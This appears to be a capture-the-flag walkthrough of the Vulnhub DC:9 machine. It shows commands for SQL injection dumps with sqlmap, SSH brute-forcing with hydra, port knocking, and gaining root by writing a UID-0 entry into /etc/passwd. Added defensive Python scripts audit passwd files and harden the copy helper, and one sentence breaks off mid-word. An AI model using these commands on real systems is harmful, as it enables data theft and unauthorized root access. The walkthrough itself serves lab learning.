
I have some terrible news: this will be my last DC Vulnhub tutorial, so read on and let’s get started on the DC:9 Vulnhub tutorial. The author (@DC9) made an announcement that the 9th iteration of his DC Vulnhub series would be his last.

Here’s What You Need

  • Kali Linux Vulnhub Machine – VirtualBox
  • DC:9 Virtual Machine – VirtualBox

Initial Enumeration – Recon

A first step is to do an nmap scan and see what is running on the target.

Ok, so we have TCP 80 open and it looks like TCP 22 is filtered, hmm.

Looking at the open port I see a web page.

Exploit the Webapp Using SQLmap

The first step is to enter a test entry for the login page and send the request to sqlmap for automatic exploitation, isn’t life grand?

I had some issues with this process at first. It turns out what you want to do is actually right click on the request page and click on “save item” and choose a directory to save the request in.

Before doing this I was just copying and pasting the request into a new file and going off of that, which did not work and got an “invalid file format” error message.

POST /results.php HTTP/1.1
Host: 10.0.0.235
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.235/search.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
Connection: close
Upgrade-Insecure-Requests: 1

search=wtf
root@kali:~/dc9# sqlmap -r req.txt -D Staff --dump-all 

Now that I have a password hash I will put it in john if need be, but first let’s check hashkiller or crackstation.net.

Hash	Type	Result
856f5de590ef37314e7c3bdf6f8a66dc	md5	transorbital1

The password is “transorbital1”, joy.

These new credentials can be tested by logging into the app. Looking at the new page, there is a dead giveaway of an exploitable vulnerability.

Notice how the page says “File does not exist”: this means the web server is trying to read a file from disk based on what it is given, which likely means there is a local file inclusion vulnerability.

Let’s see what parameters we can mess with on the web app. First I try gobuster.

Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.0.0.235
[+] Threads:        10
[+] Wordlist:       /root/seclists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Verbose:        true
[+] Timeout:        10s
===============================================================
 Starting gobuster
===============================================================
Found: /.hta (Status: 403)
Found: /.htaccess (Status: 403)
Found: /.htpasswd (Status: 403)
Found: /css (Status: 301)
Found: /includes (Status: 301)
Found: /index.php (Status: 200)
Found: /server-status (Status: 403)
===============================================================

Then I tried dirsearch.py, but then I moved on to dotdotpwn.

sudo apt-get install dotdotpwn
dotdotpwn.pl -m http -h 10.0.0.235 -M GET

Ok, so we have something about a sequence that is equal to 3 numbers separated by commas.

How to Do Port Knocking

You can do port knocking using knock.

apt install knockd
knock 10.0.0.235 7469 8475 9842

or you can do it using hping3.

hping3 -S 10.0.0.235 -p 7469 -c 1; hping3 -S 10.0.0.235 -p 8475 -c 1; hping3 -S 10.0.0.235 -p 9842 -c 1

After the sequence of ports to knock on is sent the SSH port is now open for business.

See how the TCP 22 port is now open?

Exploit SSH

Remember that dumping this table on the MySQL database on the target server displayed a bunch of usernames and passwords?

Let’s take those and try brute forcing authentication on the SSH service.

sqlmap -r req.txt -D users --dump-all

Look at all those passwords!

Grab all of these and put them into a new file, one file for usernames and one for passwords.

Now using hydra I will brute force the possible credentials against the running and now open SSH service.

hydra -L usernames -P passwords 10.0.0.235 ssh

Post Exploitation

Linux post exploitation techniques cover the bases for all common misconfigurations such as file permissions and weak service permissions.

So here is the current situation: we are logged in as the user janitor.

Looking around in the current home directory for this user there is an obviously interesting file “secrets-f

For post exploitation on DC:9 we are going to revisit the username and password list since we now have a new development.

That development is a new set of passwords.

Now we can trade in that old set of credentials used before for the user janitor for the new set. It turns out fredf is the new user of interest and we will continue with it.

Looking at what permissions the new user fredf has, we see there is one entry: he can run a command named test found in the /devstuff/test directory.

Looking at the Python file referenced by running the test binary we can see it has a pretty simple purpose.

I found the Python script by working backwards from the test binary and looking around at each directory until finding the test.py file.

The rule for creating a new user is to give it a hashed password and the other required fields of a passwd entry, which I demonstrate in the session below.

fredf@dc-9:/opt/devstuff$ openssl passwd -1 -salt guru password
$1$guru$E6rG/rKT4YVe9xb5upc/g0
fredf@dc-9:/opt/devstuff$ nano /tmp/newtry
fredf@dc-9:/opt/devstuff$ cat /tmp/newtry
guru:$1$guru$E6rG/rKT4YVe9xb5upc/g0:0:0::/root:/bin/bash
fredf@dc-9:/opt/devstuff$ sudo ./dist/test/test /tmp/newtry /etc/passwd
fredf@dc-9:/opt/devstuff$ su guru
Password: 
root@dc-9:/opt/devstuff# ls
build  dist  __pycache__  test.py  test.spec
root@dc-9:/opt/devstuff# cd ~
root@dc-9:~# ls
theflag.txt
root@dc-9:~# cat theflag.txt 
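
The entry appended above is exactly the kind of thing a defender should be able to spot: a second UID-0 account, and a password hash stored directly in /etc/passwd instead of /etc/shadow. The following audit script is an added example (not part of the original walkthrough); the sample passwd content is constructed and only reuses the guru line shown above.

```python
# Constructed sample /etc/passwd content (not taken from the box) that includes
# the rogue "guru" entry from the walkthrough: UID 0 plus an inline MD5-crypt hash,
# and a constructed passwordless account for contrast.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
fredf:x:1001:1001::/home/fredf:/bin/bash
janitor:x:1002:1002::/home/janitor:/bin/bash
guru:$1$guru$E6rG/rKT4YVe9xb5upc/g0:0:0::/root:/bin/bash
backdoor::1003:1003::/tmp:/bin/sh
"""

# Password-field values that mean "see /etc/shadow" or "locked"; anything else is suspicious.
SHADOW_MARKERS = {"x", "*", "!", "!!"}


def audit_passwd(text):
    """Return a list of (line_no, finding, username) for entries worth an analyst's attention."""
    findings = []
    seen_names = set()
    for line_no, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line_no, "malformed-entry", line))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if not uid.isdigit():
            findings.append((line_no, "non-numeric-uid", name))
            continue
        if name in seen_names:
            findings.append((line_no, "duplicate-username", name))
        seen_names.add(name)
        # A second UID-0 account is the persistence trick used in the walkthrough.
        if uid == "0" and name != "root":
            findings.append((line_no, "extra-uid0-account", name))
        # An empty password field means login with no password at all.
        if pw == "":
            findings.append((line_no, "empty-password", name))
        # A hash in world-readable /etc/passwd bypasses /etc/shadow and is offline-crackable.
        elif pw not in SHADOW_MARKERS:
            findings.append((line_no, "inline-password-hash", name))
    return findings


def audit_passwd_file(path="/etc/passwd"):
    """Run the audit against a real passwd file."""
    with open(path, encoding="utf-8") as fh:
        return audit_passwd(fh.read())


if __name__ == "__main__":
    for line_no, finding, who in audit_passwd(SAMPLE_PASSWD):
        print(f"line {line_no}: {finding}: {who}")
```

Running this periodically (or comparing against a known-good copy) catches the guru-style entry even when the attacker never touches /etc/shadow.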

Since this binary is basic, and it just reads one file and writes that file’s contents out to a second file, we can just overwrite the Linux security files!
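
The root cause here is a sudo-able helper that accepts any destination path. As an added example (not the box’s own test.py; unsafe_copy below is only a stand-in for the behaviour described above), here is how such a helper could be hardened: the destination must resolve inside an allow-listed directory (ALLOWED_DEST_DIR is an assumed name), symlinks and “..” are resolved before the check, and the open refuses to follow a symlink swapped in afterwards.

```python
import os

# Hypothetical allow-list: the only directory the helper is permitted to write into.
ALLOWED_DEST_DIR = "/opt/devstuff/output"


def unsafe_copy(src, dst):
    """Stand-in for the behaviour the walkthrough describes: any readable src, any writable dst."""
    with open(src) as fin, open(dst, "a") as fout:
        fout.write(fin.read())


def safe_copy(src, dst, allowed_dir=ALLOWED_DEST_DIR):
    """Append src's contents to dst, but only if dst resolves inside allowed_dir.

    Returns the number of bytes written. Raises PermissionError for any other
    destination, including a symlink under allowed_dir that points elsewhere.
    """
    real_dir = os.path.realpath(allowed_dir)
    real_dst = os.path.realpath(dst)  # resolves ".." and symlinks before the check
    if real_dst == real_dir or os.path.commonpath([real_dir, real_dst]) != real_dir:
        raise PermissionError(f"refusing to write outside {real_dir}: {dst}")
    if not os.path.isfile(src):
        raise ValueError(f"source must be a regular file: {src}")
    with open(src, "rb") as fin:
        data = fin.read()
    # O_NOFOLLOW makes the open fail if a symlink was swapped in after realpath() ran (TOCTOU).
    flags = os.O_WRONLY | os.O_CREAT | os.O_APPEND | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(real_dst, flags, 0o640)
    with os.fdopen(fd, "wb") as fout:
        fout.write(data)
    return len(data)


if __name__ == "__main__":
    import sys
    if len(sys.argv) != 3:
        sys.exit(f"usage: {sys.argv[0]} SRC DST")
    print(f"wrote {safe_copy(sys.argv[1], sys.argv[2])} bytes")
```

Even hardened, a root-running file writer should be in sudoers with an explicit argument pattern rather than a bare command entry, so the allow-list is enforced in two places.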

You could also overwrite the /etc/sudoers file and add your new user as a sudo user and do it that way too.

That is all for the last DC Vulnhub tutorial.
